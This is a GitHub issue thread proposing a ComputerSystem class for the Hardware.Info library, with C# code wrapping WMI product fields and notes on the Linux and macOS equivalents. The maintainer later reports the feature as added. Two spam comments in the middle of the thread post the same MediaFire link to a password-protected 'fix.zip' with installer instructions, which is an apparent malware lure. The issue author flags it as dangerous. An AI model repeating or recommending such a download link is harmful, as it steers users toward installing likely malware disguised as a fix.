### ISSUE TITLE
[Feature] Add new ComputerSystem component class

### ISSUE THREAD

**Issue by Zagrthos** [Jinjinov/Hardware.Info#70]
**Is your feature request related to a problem? Please describe.**
New models of devices have a so called UUID inside their BaseBoard to make it easier for Endpoint Management Systems to identify them uniquely. This one is missing here.
Also some of the information from the `Win32_ComputerSystemProduct` class is actually helpful.

**Describe the solution you'd like**
Create a new Component Class
```cs
using System;

// https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-computersystemproduct

namespace Hardware.Info
{
    /// <summary>
    /// WMI class: Win32_ComputerSystemProduct
    /// </summary>
    public class ComputerSystem
    {
        /// <summary>
        /// Product identification, such as a serial number on software, a die number on a hardware chip, or (for noncommercial products) a project number.
        /// </summary>
        public string IdentifyingNumber { get; set; } = string.Empty;
		
	/// <summary>
	/// Commonly used product name.
	/// </summary>
	public string Name { get; set; } = string.Empty;
	
	/// <summary>
	/// Universally unique identifier (UUID) for this product. A UUID is a 128-bit identifier that is guaranteed to be different from other generated UUIDs. If a UUID is not available, a UUID of all zeros is used.
	/// </summary>
	public string UUID { get; set; } = string.Empty;
	
	/// <summary>
	/// Name of the product's supplier, or the entity selling the product (the manufacturer, reseller, OEM, and so on).
	/// </summary>
	public string Vendor { get; set; } = string.Empty;
	
	/// <summary>
	/// Product version information.
	/// </summary>
	public string Version { get; set; } = string.Empty;

        /// <summary>
        /// Write all property values to a string
        /// </summary>
        /// <returns>Each property on a new line</returns>
        public override string ToString()
        {
            return
                "IdentifyingNumber: " + IdentifyingNumber + Environment.NewLine +
                "Name: " + Name + Environment.NewLine +
                "UUID: " + UUID + Environment.NewLine +
		"Vendor: " + Vendor + Environment.NewLine +
		"Version: " + Version + Environment.NewLine;
        }
    }
}
```
For Linux you could get the info via files in the directory `/sys/class/dmi/id`:
* sys_vendor
* product_name
* product_version
* product_serial
* product_uuid
* product_family

On macOS you can utilize the `system_profiler SPHardwareDataType` command output which displays everything necessary.

Some of the proposed properties may be doubled I think but you can decide to remove them or not.

**Describe alternatives you've considered**
N/A.

**Additional context**
I think this would make the lib more attractive and (for me personally) more usable.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zagrthos** [comment]
For anyone reading this - DO NOT CLICK ON THIS URL IN THE COMMENT ABOVE!

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jinjinov** [comment]
Thank you for suggesting this, I will look into it!

**Comment by Jinjinov** [comment]
added in https://github.com/Jinjinov/Hardware.Info/releases/tag/v100.1.1.0
